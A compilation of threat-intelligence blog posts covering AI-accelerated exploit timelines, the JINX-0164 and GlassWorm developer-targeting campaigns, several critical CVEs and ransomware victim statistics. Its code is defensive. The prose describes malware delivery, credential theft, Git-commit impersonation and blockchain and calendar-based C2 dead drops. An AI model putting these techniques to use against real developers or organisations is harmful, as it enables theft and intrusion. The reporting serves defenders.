Threat actors can now generate working exploits for common vulnerabilities and exposures (CVEs) in 0.5 days, a significant reduction from the average of 125.3 days in January 2025. This quick exploit generation creates detection and response challenges for security teams worldwide, impacting thousands of CVEs across platforms. The analysis, which covered 69,159 CVEs, found that traditional vulnerability scanners from vendors like Tenable, Qualys, and Rapid7 struggle to keep pace with this faster exploit timeline. 83.2% of critical vulnerabilities had a "visibility gap," meaning exploits were active before detection signatures were available. This trend changes defensive strategies, demonstrating that proactive threat intelligence and continuous software inventory analysis are needed to counter threats driven by AI.

This roundup details the disruption of the GlassWorm malware campaign, which targeted software developers and compromised over 300 GitHub repositories through supply chain attacks. A newly identified financially motivated threat actor, JINX-0164, uses social engineering and custom macOS malware to target cryptocurrency organizations, showing persistent and adaptable tactics. A critical Remote Code Execution (RCE) vulnerability in the Windows DNS Client with a CVSS score of 9.8 now has a public proof-of-concept (PoC) exploit released, increasing risk for affected systems.

### How Quickly is AI Developing Exploits for Known Vulnerabilities?

AI develops exploits for known CVEs in an average of 0.5 days, a significant decrease from 125.3 days in January 2025. Cogent Research measured this acceleration by analyzing 69,159 common vulnerabilities and exposures, focusing on 57,860 CVEs published in 2025 and 2026. The research indicates that widely available large language models (LLMs) can now process patch diffs (code changes published when a software vulnerability is fixed) and generate functional proof-of-concept (PoC) exploits.
This capability marks a major change in how quickly vulnerabilities can be weaponized.

The impact of this faster exploit generation on traditional vulnerability management is significant. Cogent Research identified that 83.2% of critical vulnerabilities created a "visibility gap" for defenders. More than half of critical CVEs (55.7%) never received detection coverage from major scanning technologies. Among the vulnerabilities that did eventually receive signatures, 62% already had exploits circulating before detection became available. This shows that relying on conventional scanning cycles is increasingly insufficient against current threats.

Leading commercial scanning technologies, including Tenable, Qualys, and Rapid7, showed varying response times. Tenable recorded a median detection lag of 0.1 days after disclosure, Qualys 2.9 days, and Rapid7 5.1 days. However, even with quick responses, exploits often preceded detection. For critical CVEs, 62.5% were exploited before Tenable's signatures shipped, 64.5% before Qualys', and 73.5% before Rapid7's. This data suggests the challenge comes from scanner vendor detection latency, not only organizational scanning frequency.

The future outlook indicates further shortening of exploit development timelines. Geng Sng, co-founder and CTO of Cogent Security, stated that the observed 0.5-day exploit development will become the baseline once Anthropic's Claude Mythos becomes widely accessible. This AI is reported to develop working exploits at the level of an experienced security researcher, with its proliferation anticipated within six to twelve months. This capability, often seen with agentic AI threats, alters the timeline for zero-day exploitation and overall threat response.

To counter this trend, Cogent Research recommends that organizations implement software inventory analysis as an early warning layer.
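The following Python, an added example rather than code from purple-ops.io or Cogent Research, sketches that early warning layer: it matches an inline software inventory against an inline advisory feed using OSV-style version ranges and flags hits whose advisory is still inside the 0.5-day window the research describes; the package names, advisory IDs, asset names and timestamps are constructed.

```python
"""Match a software inventory against newly disclosed CVEs as an early-warning layer.
Added example, not code from purple-ops.io or Cogent Research; package names, advisory
identifiers, version ranges and timestamps are constructed, and a real deployment would
read a CycloneDX/SPDX SBOM and an OSV-style advisory feed instead of the inline lists."""
from datetime import datetime, timedelta, timezone

# The article's measured AI-assisted exploit timeline (0.5 days) as a triage threshold.
AI_EXPLOIT_WINDOW = timedelta(hours=12)


def parse_version(v):
    """'2.4.1' or '2.4.1-rc1' -> (2, 4, 1); non-numeric segments sort below any number."""
    core = v.split("-", 1)[0]
    return tuple(int(p) if p.isdigit() else -1 for p in core.split("."))


def is_affected(version, introduced, fixed=None):
    """OSV-style half-open range: introduced <= version < fixed (fixed=None: no fix yet)."""
    v = parse_version(version)
    if v < parse_version(introduced):
        return False
    return fixed is None or v < parse_version(fixed)


def match_inventory(sbom, advisories, now):
    """Return one hit per (asset, component, advisory), newest advisory first."""
    hits = []
    for adv in advisories:
        age = now - adv["published"]
        for rng in adv["affected"]:
            for asset in sbom:
                for comp in asset["components"]:
                    if (comp["ecosystem"], comp["name"]) != (rng["ecosystem"], rng["package"]):
                        continue
                    if not is_affected(comp["version"], rng["introduced"], rng.get("fixed")):
                        continue
                    hits.append({
                        "asset": asset["asset"],
                        "component": f'{comp["name"]}@{comp["version"]}',
                        "advisory": adv["id"],
                        "severity": adv["severity"],
                        "age_hours": round(age.total_seconds() / 3600, 1),
                        # Inside the 0.5-day window an exploit may already exist while no
                        # scanner signature ships yet, so these hits are triaged first.
                        "inside_ai_exploit_window": age <= AI_EXPLOIT_WINDOW,
                        "fix_version": rng.get("fixed"),
                    })
    hits.sort(key=lambda h: h["age_hours"])
    return hits


# Constructed inventory: two assets, one of them already on the fixed version.
SBOM = [
    {"asset": "build-runner-01", "components": [
        {"ecosystem": "npm", "name": "example-http-parser", "version": "4.2.0"},
        {"ecosystem": "PyPI", "name": "example-image-lib", "version": "10.1.0"},
    ]},
    {"asset": "web-frontend-02", "components": [
        {"ecosystem": "npm", "name": "example-http-parser", "version": "4.3.1"},
    ]},
]

NOW = datetime(2026, 5, 28, 12, 0, tzinfo=timezone.utc)

# Constructed advisory feed: one advisory published three hours ago, one two days old.
ADVISORIES = [
    {"id": "ADV-CONSTRUCTED-0001", "severity": "CRITICAL", "published": NOW - timedelta(hours=3),
     "affected": [{"ecosystem": "npm", "package": "example-http-parser",
                   "introduced": "4.0.0", "fixed": "4.3.1"}]},
    {"id": "ADV-CONSTRUCTED-0002", "severity": "HIGH", "published": NOW - timedelta(days=2),
     "affected": [{"ecosystem": "PyPI", "package": "example-image-lib",
                   "introduced": "10.0.0", "fixed": None}]},
]

if __name__ == "__main__":
    for h in match_inventory(SBOM, ADVISORIES, NOW):
        flag = "TRIAGE NOW" if h["inside_ai_exploit_window"] else "schedule"
        print(f'{flag:10} {h["asset"]:16} {h["component"]:28} {h["advisory"]} ({h["age_hours"]}h)')
```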
This involves continuously mapping software assets against newly disclosed CVEs within minutes of publication, enabling proactive mitigation before scanner signatures are available. Developing a parallel detection path, integrating software bill of materials (SBOM) matching with threat intelligence feeds, offers a quicker way to identify affected assets. This rapid generation of exploits by AI shows the need for new breach detection mechanisms, moving beyond traditional scanner reliance.

### Which Financially Motivated Group Targets Cryptocurrency Developers with Custom macOS Malware?

JINX-0164, a previously untracked financially motivated threat actor, targets cryptocurrency organizations and their developers with custom macOS malware and social engineering. Wiz CIRT and Wiz Research have detailed JINX-0164's operations, active since at least mid-2025. The group's campaigns use convincing LinkedIn profiles for initial contact, often masquerading as recruiters offering virtual meetings, to lure victims into downloading malicious files.

The attack chain typically begins with social engineering via LinkedIn, where the threat actor impersonates business partners or recruiters to propose virtual meetings. These invitations link to malicious domains disguised as legitimate teleconferencing platforms, like Microsoft Teams. Upon clicking the link, the victim unknowingly downloads and executes AUDIOFIX. This Python-based macOS infostealer and remote access tool (RAT) is delivered via a bash script hosted on a fake driver store domain such as apple.driver-store[.]com. The payload, often named ChromeUpdater, masquerades as a system audio driver (coreaudiod) and achieves persistence via launchctl.

Once AUDIOFIX gains control, it harvests many credentials and sensitive data. This includes information from macOS Keychain files, browser-stored credentials from seven different browsers, local admin credentials, SSH keys, and configuration files.
The malware targets 51 cryptocurrency wallet browser extensions, including MetaMask, Phantom, Coinbase Wallet, and Binance Chain, plus two desktop wallet applications. The threat actor also hijacks active sessions from communication applications such as Discord, Slack, and Telegram. It exfiltrates cloud infrastructure secrets like AWS, GCP, and Azure keys, and Cloudflare API tokens.

JINX-0164 demonstrated lateral movement capabilities by injecting AUDIOFIX into internal code repositories after compromising a developer's endpoint. They employed deceptive Git tactics, such as modifying committer names to impersonate other developers, pushing malicious code directly to main branches in unprotected repositories, or inserting payloads into existing branches. This tactic turned the organization's development infrastructure into a propagation vector, infecting additional machines when employees updated their code. In one instance, GitHub's Vigilant Mode detected unverified commits, which revealed the impersonation and allowed intervention.

Beyond direct developer targeting, JINX-0164 has also conducted supply chain operations. On April 7, 2026, the group trojanized version 4.9.1 of the npm package @velora-dex/sdk. This malicious package appended code to dist/index.js that downloaded MINIRAT, a lightweight Go-based backdoor, whenever the package was imported. MINIRAT performs basic system reconnaissance and establishes persistence. It also offers fundamental backdoor functionality to upload, download, and execute shell commands. The threat actor masks their cloud activity and C2 communications by routing connections through VPN services such as Mullvad VPN, Astrill VPN, and Express VPN.

### What Disruptions Hit the GlassWorm Developer Supply Chain Campaign?

A coordinated takedown by CrowdStrike, Google, and the Shadowserver Foundation disrupted all four command-and-control (C2) channels associated with the GlassWorm malware campaign.
This collaborative effort neutralized the strong infrastructure that supported a persistent software supply chain attack targeting software developers since at least early 2025. The campaign poisoned over 300 GitHub repositories, using compromised developer credentials for broader impact.

GlassWorm operators systematically targeted software developers, recognized for their access to critical assets such as source code repositories, cloud platforms, CI/CD pipelines, and package registries. The campaign used several approaches, including trojanized VS Code extensions published on both the Microsoft VS Code Marketplace and Open VSX. This allowed them to target users of VS Code forks like Cursor, Positron, Windsurf, and VSCodium. Malicious code was also introduced through compromised npm and Python packages, significantly expanding the attack surface.

The primary objective of the GlassWorm campaign was to deliver a data-theft framework. This framework incorporated capabilities for credential harvesting, cryptocurrency wallet exfiltration, and system profiling. Subsequent iterations of GlassWorm deployed a Websocket-based JavaScript RAT known as GlassWormRAT. This RAT was designed to steal web browser data. It could install a Google Chrome extension to collect sensitive information, including screenshots, keystrokes, and clipboard content from infected systems. The malware also converted infected hosts into covert infrastructure, acting as SOCKS proxies, hidden VNC (HVNC) servers, and remote execution nodes.

A key characteristic of the GlassWorm operation was its strong C2 infrastructure, comprising four distinct channels designed to withstand takedown attempts. These channels included using the Solana blockchain as a dead drop resolver, storing C2 server addresses in the memo fields of blockchain transactions. The malware also queried the BitTorrent Distributed Hash Table (DHT) peer-to-peer network for configuration data.
Google Calendar also served as a dead drop resolver, fetching C2 server addresses from event titles. Direct connections to C2 infrastructure hosted on commercial VPS providers completed the quartet of communication channels. The coordinated takedown simultaneously neutralized all four C2 channels, preventing infected machines from receiving new instructions or payloads.

CrowdStrike attributed the GlassWorm activity to likely Russia-based cybercriminals, citing the malware's termination of execution on systems located in Commonwealth of Independent States (CIS) countries and Russian-language comments within the code. The disruption shows the ongoing challenge of securing the software supply chain against well-resourced and persistent adversaries.

### Is a Critical RCE Vulnerability Affecting Windows DNS Clients Actively Exploited?

A critical Remote Code Execution (RCE) vulnerability affecting the Windows DNS Client, with a CVSS score of 9.8, now has a publicly disclosed proof-of-concept (PoC) exploit. While specific details on active exploitation are not provided, the public release of a PoC escalates the risk to affected systems. Such vulnerabilities, especially those with a critical CVSS rating and public PoC, are frequently adopted by threat actors for widespread exploitation.

The vulnerability involves a heap overflow within the Windows DNS Client component. A heap overflow condition can enable an attacker to overwrite adjacent memory, which can lead to arbitrary code execution with the privileges of the affected service or user. Given the pervasive nature of DNS Client functionality in Windows environments, successful exploitation could lead to system compromise. The absence of detailed exploitation specifics does not diminish the severity. The prompt availability of a PoC typically lowers the barrier for attackers to develop reliable exploits, increasing the urgency for patch deployment and mitigation.
Organizations using Windows DNS Client across their infrastructure face an immediate threat from opportunistic and targeted attacks using this flaw.

### Technical Takeaways

- AI has significantly shortened exploit development time for known CVEs from 125.3 days to 0.5 days, changing the speed of threat emergence.
- Traditional vulnerability scanners and their detection signatures frequently lag behind AI-driven exploit generation, creating "visibility gaps" for over 83% of critical vulnerabilities.
- Financially motivated threat actor JINX-0164 employs LinkedIn social engineering, custom macOS malware (AUDIOFIX, MINIRAT), and CI/CD pipeline hijacking to target cryptocurrency organizations and developers.
- The GlassWorm malware campaign, which poisoned over 300 GitHub repositories, used strong C2 infrastructure across the Solana blockchain, BitTorrent DHT, and Google Calendar before its disruption.
- A critical RCE vulnerability (CVSS 9.8) in the Windows DNS Client now has a public PoC, requiring immediate attention for patching and mitigation due to its potential for widespread impact.

---

## IBM ELM Jazz CVE-2026-3660 (CVSS 9.8) Auth Bypass

- URL: https://purple-ops.io/blog/ibm-elm-jazz-cve-2026-3660
- Date: 2026-05-28
- Category: CVE Analysis
- Tags: ibm-elm, jazz-foundation, cve-2026-3660, authentication-bypass, critical-vulnerability
- Reading time: 5 min | CVSS: 9.8

**Summary:** IBM ELM Jazz Foundation CVE-2026-3660, a critical authentication bypass with CVSS 9.8, enables unauthenticated remote attackers to gain unauthorized access.

IBM has issued a security bulletin addressing a critical authentication bypass vulnerability, designated CVE-2026-3660, within its Engineering Lifecycle Management (ELM) - Jazz Foundation. This flaw carries a CVSSv3.1 score of 9.8, categorizing it as critical. The vulnerability allows an unauthenticated remote attacker to gain unauthorized access by manipulating server property files.
The security defect stems from incorrect authorization logic within the software's core identity layer, enabling adversaries to bypass standard authentication checks. This bypass facilitates unauthorized modification of configuration files, potentially leading to compromise of active corporate application deployments. While the vendor has released full iFix updates to fix the vulnerability, the potential for severe impact on intellectual property and development lifecycles requires organizations to act immediately. The remote and unauthenticated nature of this exploit pathway makes it urgent for administrators to deploy the recommended patches.

### What is CVE-2026-3660 and why is it critical?

CVE-2026-3660 is an authentication bypass vulnerability affecting IBM Engineering Lifecycle Management - Jazz Foundation, stemming from incorrect authorization logic. It is rated with a CVSSv3.1 score of 9.8, indicating a critical severity due to its significant impact and ease of exploitation. This vulnerability specifically allows an unauthenticated remote attacker to update server property files, subsequently enabling unauthorized access to the application.

The criticality of CVE-2026-3660 arises from its potential to allow threat actors to circumvent foundational security controls without any prior authentication or user interaction. In an engineering platform like IBM ELM - Jazz Foundation, unauthorized access translates directly into significant risks for intellectual property, product designs, and the integrity of ongoing development lifecycles. An attacker using this flaw could view proprietary information, alter critical configurations, or potentially disrupt development processes, making its remediation an immediate priority for all affected deployments.

### Impact

An attacker successfully exploiting CVE-2026-3660 can achieve unauthorized access to the IBM Engineering Lifecycle Management (ELM) application.
This access is gained by altering server property files without requiring any authentication or user interaction. The primary risk lies in the compromise of an organization's intellectual property and the integrity of its engineering and development processes.

Organizations utilizing the IBM Jazz Foundation as a core component of their engineering solutions are at risk. Attackers could view sensitive product designs, manipulate active development lifecycles, or gain insights into proprietary information. Such unauthorized access can lead to intellectual property theft, operational disruption, and potential supply chain vulnerabilities if compromised systems are used in broader development pipelines. The ability to hijack user sessions silently after altering configuration files amplifies the risk, making the scope of potential damage extensive. This kind of authentication bypass poses a direct threat to the confidentiality, integrity, and availability of critical enterprise assets.

### Exploitation chain

The exploitation chain for CVE-2026-3660 begins with an unauthenticated remote attacker. The core vulnerability is an issue of incorrect authorization logic within the IBM Jazz Foundation framework. Specifically, the software's identity layer fails to properly validate changes to its configuration files.

The attack vector is entirely remote, requiring no local access or prior privileges on the part of the attacker. There is also no user interaction required from a legitimate user for the exploit to succeed. The attacker directly targets the server, using the flaw where configuration files lack proper validation. By exploiting this weakness, adversaries can alter specific server property files. This modification then enables them to bypass standard authentication mechanisms and gain unauthorized access to the application, effectively hijacking user sessions or establishing persistent access.
There is no information in the provided research about a publicly available Proof of Concept (PoC) exploit or active exploitation in the wild for CVE-2026-3660 specifically, though the nature of the flaw indicates it is readily exploitable. Organizations should consider similar authentication bypass vulnerabilities, such as those discussed in our prior analysis of a critical RCE flaw in IBM WebSphere, which also show the severe consequences of identity-related vulnerabilities.

### Affected products and versions

The critical authentication bypass vulnerability, CVE-2026-3660, impacts specific releases of the IBM Engineering Lifecycle Management - Jazz Foundation product line. Organizations running these versions are strongly advised to apply the necessary updates immediately to mitigate the risk of exploitation. The affected product and version ranges are as follows:

IBM Engineering Lifecycle Management - Jazz Foundation versions:

- 7.0.3 through iFix021
- 7.1.0 through iFix009
- 7.2.0 through iFix001

Newer installations or systems that have been fully patched beyond these specified iFix levels are not vulnerable to this particular flaw. Administrators should verify their current installed versions against these ranges to determine exposure.

### Detection

Given the nature of CVE-2026-3660 as an authentication bypass achieved by altering server property files, detection efforts should focus on identifying anomalous access patterns, unauthorized modifications to critical system files, and suspicious authentication attempts. While the provided research does not detail specific Indicators of Compromise (IOCs) or EDR queries, general principles of security monitoring can be applied. Detection strategies should include:

- **Log Monitoring:** Regularly review application, authentication, and system logs for unusual activity. Look for:
  - Unauthenticated access attempts to sensitive administrative interfaces or configuration endpoints.
  - Log entries indicating modification of server property files (e.g., teamserver.properties, server.startup, or other core configuration files) by unauthorized users or processes.
  - Successful logins by accounts that do not correspond to legitimate user activity, or that are not preceded by proper authentication events.
  - Authorization or authentication errors that might precede a successful bypass attempt.
- **File Integrity Monitoring (FIM):** Implement FIM on critical IBM Jazz Foundation server directories, especially those containing configuration and property files. FIM tools can alert administrators to any unauthorized change to these files, which is the core mechanism of this exploitation.
- **Network monitoring:** Observe network traffic for unusual connections to the IBM Jazz Foundation server from unknown or untrusted IP addresses. While the exploit itself modifies internal files, the initial access traverses the network.
- **EDR/XDR solutions:** Configure Endpoint Detection and Response (EDR) or Extended Detection and Response (XDR) tooling to flag suspicious process activity originating from the IBM Jazz Foundation application, including processes that modify configuration files outside of standard administrative tools or scheduled updates.

Organizations should also correlate these observations with threat intelligence sources that may release specific IOCs if CVE-2026-3660 is found to be actively exploited in the future. Proactive monitoring of such events can provide early warning of potential compromise, much like the methods for detecting other critical authentication bypasses explored in our article on CVE-2026-20182 impacting Cisco SD-WAN.

### Remediation

IBM has released iFix updates addressing CVE-2026-3660. Immediate application of these patches is the primary and most effective remediation strategy.
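File integrity monitoring of the property files named in the detection guidance above is the one control that watches the exact mechanism of this bypass. The following is an added example, not IBM's code and not this site's: a minimal baseline-and-verify checker in Python that hashes every file under a configuration directory, stores the baseline as JSON, and reports modified, added or removed files. The directory layout, the file contents and the rogue file in the demo run are constructed; teamserver.properties and server.startup appear only because they are the file names cited above.

```python
import hashlib
import json
import tempfile
from pathlib import Path

# File names cited in the detection guidance. The baseline hashes every regular
# file under the configuration directory; these only seed the constructed demo.
WATCHED_EXAMPLES = ("teamserver.properties", "server.startup")


def sha256_file(path: Path) -> str:
    """Stream the file through SHA-256 so large files are not loaded into memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(conf_dir: Path) -> dict:
    """Map each file path (relative to conf_dir) to its hash and size."""
    baseline = {}
    for p in sorted(conf_dir.rglob("*")):
        if p.is_file():
            rel = p.relative_to(conf_dir).as_posix()
            baseline[rel] = {"sha256": sha256_file(p), "size": p.stat().st_size}
    return baseline


def save_baseline(baseline: dict, out: Path) -> None:
    out.write_text(json.dumps(baseline, indent=2, sort_keys=True))


def load_baseline(src: Path) -> dict:
    return json.loads(src.read_text())


def verify(conf_dir: Path, baseline: dict) -> list:
    """Return sorted (status, relative_path) tuples: modified, added or removed."""
    current = build_baseline(conf_dir)
    findings = []
    for rel, meta in baseline.items():
        if rel not in current:
            findings.append(("removed", rel))
        elif current[rel]["sha256"] != meta["sha256"]:
            findings.append(("modified", rel))
    for rel in current:
        if rel not in baseline:
            findings.append(("added", rel))
    return sorted(findings)


def demo_tamper_run() -> list:
    """Constructed end-to-end run: baseline a throwaway config tree, change it
    the way the advisory describes (edit a property file, drop in a new one),
    then re-verify against the saved baseline. Returns the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        conf = Path(tmp) / "conf"
        conf.mkdir()
        (conf / WATCHED_EXAMPLES[0]).write_text("example.property=true\n")  # constructed content
        (conf / WATCHED_EXAMPLES[1]).write_text("-Xmx4g\n")                 # constructed content
        baseline_file = Path(tmp) / "baseline.json"
        save_baseline(build_baseline(conf), baseline_file)

        # Simulated unauthorized edit plus a dropped-in extra file
        with (conf / WATCHED_EXAMPLES[0]).open("a") as fh:
            fh.write("another.property=tampered\n")
        (conf / "rogue.properties").write_text("x=y\n")

        return verify(conf, load_baseline(baseline_file))


if __name__ == "__main__":
    for status, rel in demo_tamper_run():
        print(f"{status:9} {rel}")
```

Keep the baseline (or a signed copy of it) off the server, re-run `verify` from a scheduled job or your FIM tool, and treat any modified or added entry under the Jazz configuration tree that does not line up with a change ticket or an iFix installation as an alert. Comparing content hashes catches edits that timestamp-only checks miss.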
The following steps outline the required remediation and mitigation actions:

- **Patching:** Administrators running IBM Engineering Lifecycle Management - Jazz Foundation 7.0.3 must upgrade to iFix022 or later. Deployments on 7.1.0 must upgrade to iFix010 or later, and deployments on 7.2.0 must install iFix002 or later. The latest iFix releases include all prior fixes and address the incorrect authorization logic that allows the authentication bypass. Detailed upgrade instructions and the iFix packages are available through the official IBM Support portal.
- **Workarounds:** The provided research does not specify any workaround that would eliminate the need for patching; given the fundamental nature of the authorization flaw, a patch is the only definitive resolution. If immediate patching is not feasible, organizations should consider temporary network-level restrictions that limit access to the IBM Jazz Foundation application to trusted internal networks or specific IP ranges. This is a partial mitigation and does not fix the underlying vulnerability.
- **Continuous monitoring:** After applying patches, maintain enhanced monitoring for unusual activity as described in the detection section, including ongoing log analysis and file integrity monitoring, to confirm that the vulnerability is no longer exploitable and that no residual compromise exists.

Failing to apply these updates leaves company assets exposed to unauthorized access, potentially impacting intellectual property and the integrity of development lifecycles.

### Technical Takeaways

- CVE-2026-3660 is a critical authentication bypass vulnerability in IBM Engineering Lifecycle Management - Jazz Foundation, assigned a CVSSv3.1 score of 9.8.
- The flaw originates from incorrect authorization logic, allowing an unauthenticated remote attacker to modify server property files.
- Exploitation requires no user interaction or prior privileges, giving direct unauthorized access to the application.
- Affected versions are 7.0.3 through iFix021, 7.1.0 through iFix009, and 7.2.0 through iFix001.
- IBM has provided specific iFix updates (iFix022 for 7.0.3, iFix010 for 7.1.0, iFix002 for 7.2.0) as the definitive remediation.

---

## DragonForce Ransomware 19 Real Estate Healthcare Victims

- URL: https://purple-ops.io/blog/dragonforce-ransomware-real-estate-healthcare
- Date: 2026-05-27
- Category: Ransomware Report
- Tags: dragonforce-ransomware, real-estate, healthcare, ransomware-activity, threat-intelligence
- Reading time: 5 min

**Summary:** DragonForce ransomware claimed 19 victims in the Real Estate and Healthcare sectors this period, highlighting ongoing threats.

### Statistical Overview

**Victim Totals**

- This month: 689
- This quarter: 1467
- Year to date: 4092
- Last 24h: 36

**Quarterly Breakdown**

Q1: 2631 | Q2: 1467 | Q3: 0 | Q4: 0

Ransomware activity shows consistent levels this quarter, with DragonForce a notable contributor in this period. The sustained victim count shows threat actors continue operating across diverse sectors.

### Introduction

In the last 24 hours, 36 new ransomware victims have been reported. DragonForce was the most active group, accounting for over half of these incidents, followed by 0day-syndicate. Primary affected sectors include Real Estate, Healthcare, and Technology, with a significant concentration of incidents observed in the United States and the Netherlands.
### Ransomware Summary Table

| # | Group | Victims (24h) | Sample Victims | Geos | Sectors |
|---|---|---|---|---|---|
| 1 | DragonForce | 19 | Delbrook capital advisors, Dentonfirm.com, Duboisag.com (+16) | Netherlands, United States | Real Estate, Healthcare |
| 2 | 0day-syndicate | 4 | Dxon.com.br, Gokids gokidspublishing.com dev.redpilotstudio.com gokidsmobile.com, Xgenize.com (+1) | Brazil, Nigeria | Technology / Software, Professional Services |
| 3 | Medusa Locker | 3 | Baeaoai, Baeaxai, Bakaxah | None, United States | Technology / Software, Manufacturing |
| 4 | Akira | 2 | Gone fishin' marine, Northwest woodworks | United States | Construction & Engineering, Retail & Ecommerce |
| 5 | Space Bears | 2 | Gestordes, Ridge law firm | Spain, United States | Legal, Professional Services |
| 6 | Anubis | 1 | Exceed energy | United Kingdom | Energy & Utilities |
| 7 | Doommageddon | 1 | Innovano | India | Technology / Software |
| 8 | INC Ransom | 1 | Distrigaz Vest S.A. | Romania | Energy & Utilities |
| 9 | M3RXDLS | 1 | Jichasa.com | Mexico | Transportation & Logistics |
| 10 | Nova (RALord) | 1 | Textile testing services of america | Mexico | Professional Services |
| 11 | The Gentelman | 1 | Techmar | Netherlands | Construction & Engineering |

DragonForce was the most active group during this period, claiming 19 victims, primarily in the Real Estate and Healthcare sectors across the United States and the Netherlands. Other active groups, including 0day-syndicate, Medusa Locker, and Akira, contributed a diverse range of victims spanning Technology, Professional Services, and Manufacturing. INC Ransom targeted Distrigaz Vest S.A. in Romania, showing a continued threat to critical infrastructure within the Energy & Utilities sector. For more on DragonForce's operations and targeting profiles, see our recent analysis.
### Victim Distribution

**By Country**

- United States: 13
- United Kingdom: 4
- Netherlands: 3
- None: 3
- Mexico: 2
- Canada: 2
- Spain: 1
- Romania: 1
- Brazil: 1
- Germany: 1

**By Industry**

- Legal Services: 2
- Construction: 2
- Accounting: 1
- Natural Gas Distribution: 1
- Manufacturing: 1
- Oil and Gas: 1
- Staffing and Recruiting: 1
- Telecommunications and Traffic Management: 1
- Architectural Services: 1
- Architecture and Planning: 1

The United States remains the most targeted country, followed by the United Kingdom and the Netherlands. Industry targeting is diversified, with significant activity across professional services such as Legal and Accounting, as well as critical sectors such as Natural Gas Distribution and Oil and Gas. More information on ransomware group activity, including Medusa Locker and Akira, is in our recent threat intelligence updates.

### Ransomware News

**Topline**

Ransomware developments include warnings of in-person data theft tactics by the Silent Ransom Group, reported ransomware incidents affecting municipalities, a Qilin group victim claim, and new cryptojacking campaigns using AI chatbots.

**Campaigns & Operations**

The FBI issued a warning regarding the Silent Ransom Group (SRG), also known as Luna Moth, Chatty Spider, and UNC3753, for an extortion scheme targeting U.S. law firms. The scheme combines social engineering, such as posing as IT support to obtain remote access, with a fallback in which actors physically insert USB drives to exfiltrate data. Incidents include a ransomware attack on Casalp's Livorno operations in Italy on May 11, 2026, and a partial compromise of Nandrin Municipality's IT infrastructure in Belgium around March 15, 2026. The Qilin ransomware group also named New Zealand's Alpha Group Holdings as a victim, providing limited incident details. Analysis of the wider ransomware field and quarterly trends is in our recent activity updates.
**Vulnerabilities & TTPs**

SRG's tactics involve impersonating IT personnel via phone, email, or live chat to gain initial access, then escalating privileges to deploy ransomware or exfiltrate data for double extortion, often blending in with legitimate IT workflows. Separately, an active cryptojacking campaign is using AI chatbot interactions and SEO poisoning to redirect users to attacker-controlled download sites, delivering a rogue DLL via a packed ScreenConnect installer to establish persistence and run miners while bypassing Microsoft Defender.

**Analyst Note**

These events show a changing threat environment, marked by sophisticated social engineering, persistent infrastructure targeting, and the exploitation of emerging technologies and search vectors for malicious purposes.

### Technical Takeaways

- DragonForce led reported ransomware activity this period, affecting mainly the Real Estate and Healthcare sectors.
- The United States remains the most frequent target country, with a broad distribution of victim industries.
- The Silent Ransom Group (SRG) uses a varied extortion approach, blending social engineering with potential physical access to victim networks for data exfiltration.
- Emerging attack vectors include cryptojacking campaigns that manipulate AI chatbot recommendations and search engine optimization to distribute malware.
- Critical infrastructure entities, such as Distrigaz Vest S.A., continue to be targeted by ransomware groups like INC Ransom.

---

## SharePoint Server CVE-2026-45659 RCE (CVSS 8.8)

- URL: https://purple-ops.io/blog/sharepoint-server-cve-2026-45659-rce
- Date: 2026-05-27
- Category: CVE Analysis
- Tags: none
- Reading time: 9 min | CVSS: 8.8

**Summary:** Microsoft SharePoint Server CVE-2026-45659 is a critical RCE vulnerability scoring CVSS 8.8. Learn the risks, affected versions, and how to patch now.
Microsoft has released an out-of-band patch addressing CVE-2026-45659, a critical remote code execution (RCE) vulnerability affecting SharePoint Server. The flaw, which stems from deserialization of untrusted data, carries a CVSS score of 8.8, indicating high severity and potential for significant impact. An authenticated attacker with only minimal privileges, such as Site Member permissions, can exploit CVE-2026-45659 remotely. Although Microsoft initially described exploitation as "less likely," its decision to issue an immediate out-of-band patch outside the regular Patch Tuesday cycle confirms the significant risk the vendor attributes to this vulnerability.

As of the current reporting, no public exploit code has surfaced, nor has there been any indication of in-the-wild exploitation. However, SharePoint Server's history as a high-value target for cyber adversaries, coupled with the rapid development of proof-of-concept (PoC) exploits for similar disclosures, requires immediate attention to patching by affected organizations.

### What is CVE-2026-45659 and why is it critical?

CVE-2026-45659 is a remote code execution vulnerability in Microsoft SharePoint Server that carries a CVSS score of 8.8. It is classified as critical because it can allow an authenticated attacker to execute arbitrary code on the affected server. The flaw specifically involves deserialization of untrusted data, a well-documented vulnerability class: when an application deserializes data without proper validation, it can be tricked into interpreting malicious input as executable code or commands, leading to full compromise of the server. The criticality of CVE-2026-45659 is amplified by several factors despite Microsoft's initial assessment of "less likely to exploit."
These include low attack complexity, no user interaction required for successful exploitation, and the minimal privileges (Site Member permissions) an attacker needs. Together these attributes significantly lower the barrier for a potential attacker. Microsoft's proactive release of an out-of-band patch, rather than waiting for scheduled updates, further shows the urgency and severity the vendor attributes to this vulnerability. For a review of similar critical SharePoint vulnerabilities, refer to our prior analysis of a critical RCE vulnerability in Microsoft SharePoint Server.

### Impact of CVE-2026-45659

Successful exploitation of CVE-2026-45659 could have a high impact on the confidentiality, integrity, and availability of the affected SharePoint Server system. An authenticated attacker who achieves remote code execution can potentially gain full control over the server, enabling a range of malicious activities from data exfiltration to the deployment of further malicious payloads. The confidentiality of sensitive documents, project data, employee records, and intellectual property stored within SharePoint environments could be severely compromised; the integrity of those data sets and of the server's operational state could be altered or corrupted; and availability could be disrupted through denial-of-service or ransomware attacks.

SharePoint Server installations, particularly on-premises deployments, are high-value targets for cyber adversaries. These platforms frequently serve as central repositories for vast amounts of critical enterprise data, making them attractive for both intellectual property theft and financial extortion. SharePoint's extensive integration with other crucial Microsoft services, such as Active Directory, Teams, and Outlook, means a successful breach often provides a strategic beachhead for lateral movement across an entire enterprise network.
This expands the potential blast radius of an exploit far beyond the initial SharePoint Server. Our prior insights into a SharePoint zero-day vulnerability and critical mitigation steps further illustrate the persistent threats surrounding this product.

Historically, SharePoint vulnerabilities have been actively exploited by sophisticated threat actors. China-linked groups, including Linen Typhoon and Violet Typhoon, have used SharePoint flaws for intellectual property theft, showing the strategic value of compromised SharePoint environments. Ransomware operators such as Storm-2603 have also exploited these vulnerabilities to deploy extortion campaigns, demonstrating the direct financial motivations behind such attacks. In July 2025, a critical zero-day vulnerability chain dubbed ToolShell was actively exploited against on-premises SharePoint deployments. Those attacks targeted various sectors, including government agencies, universities, corporations, and even the US Nuclear Weapons Agency, emphasizing the severe real-world implications of SharePoint vulnerabilities.

